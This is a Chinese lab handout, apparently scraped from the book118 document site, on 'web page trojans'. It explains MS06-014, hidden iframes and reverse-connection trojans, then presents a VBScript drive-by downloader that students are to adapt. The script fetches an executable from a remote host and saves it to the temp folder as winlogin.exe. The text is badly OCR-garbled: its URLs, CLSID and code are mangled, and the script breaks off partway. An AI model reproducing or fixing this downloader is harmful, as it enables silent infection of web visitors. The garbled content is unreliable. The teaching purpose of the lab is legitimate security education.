- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
网页木马原理及相关定义
浏览器是用来解释和显示万维网文档的程序,已经成为用户上网时必不可少的工具之一。
“网页木马”由其植入方式而得名,是通过浏览网页的方式被植入到被控主机上,并对被控主机进行控制。与其它网页不同,木马网页是黑客精心制作的,木马网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
如果打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那么用户将会面临巨大的威胁。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。本练习中,我们利用微软的MS06014漏洞,完成网页木马的植入。
名词解释
MS06014漏洞
MS06014漏洞存在于MicrosoftDataAccessComponents,利用微软的HTMLObject标签的一个漏洞,Object标签主要是用来把ActiveX控件插入到HTML页面里。由于加载程序没有根据描述远程Object数据位置的参数检查加载文件的性质,因此Web页面里面的程序就会不经过用户的确认而自动执行。
iframe标签
iframe也叫浮动帧标签,它可以把一个HTML网页嵌入到另一个网页里实现“画中画”的效
果。例如:
|iframesrc=^http://ww.jlcss.con/irides,htmVname=,vjlcssvidth=CTheight=CTframeticirder=CT
被嵌入的网页可以控制宽、高以及边框大小和是否出现滚动条等。如果把宽(width)、高(height)、边框(frameborder)都设置为了“0”,代码插入到首页后,首页不会发生变化,但是嵌入的网页实际上已经打开。
反弹端口型木马
分析防火墙的特性后可以发现,防火墙对于连入的链接往往会进行非常严格的过滤,但是对于连出的链接却疏于防范。于是,与一般的木马相反,反弹端口型木马的服务端(被控制端)使用主动端口,客户端(控制端)使用被动端口。木马定时监测控制端的存在,发现控制端上线后立即弹出端口主动连接控制端打开的被动端口。服务端通常会把打开的端口伪装成应用软件的端口,从而进一步降低被防火墙发现的概率。
网页木马生成脚本
通常网页木马是通过“网马生成器”将木马安装程序的下载地址附加在网页上的,进而达到用户浏览含有木马的网页即自动下载安装程序的目的。下面给出一个“网马生成器”脚本,其中“//”后面的文字是对代码的注释。实验中,同学们改动此脚本,自己动手生成网页木马。
html
作
scriptlanguage^VBScript17
onerrorresumenext
dl=http:/7呈佥抒1妣屡:9090/Server_Settp.eKe 定义dl”为木马下载地址
Setdf=document.createElementobject) /7M立一个对彝
df.setAttributeclassid^clsid:BD5.6.C55 5A3-1ID 3At.Q.QC04FC29E36
”声明网马的clsid
str=Microsoft.KMLHTTP 使用KMLhttp对象
Setk=df.CreateObject(str^
strl=Adodb.Stream
setS=df.createobject(strlj) //用Adodb.Stream执行文件操
S.type=1
池AGET
k.Openstr2jdl.Falsek.Send
fname^,winlogin.eze
/V使用睛t力可狭取不与乂1干
/V根据木马地址荻取木马文件
/V定义木马的文件名
//用FileSystemObjec执行文件操作,这次是写入文件
setF=df.createobject(Scripting.FileSystemObject
settmp=F.GetSpecialFolder(2) /y缺取临时文件夹路径
fname1=F.BuildPath(tmpjfname1)
S.ope
文档评论(0)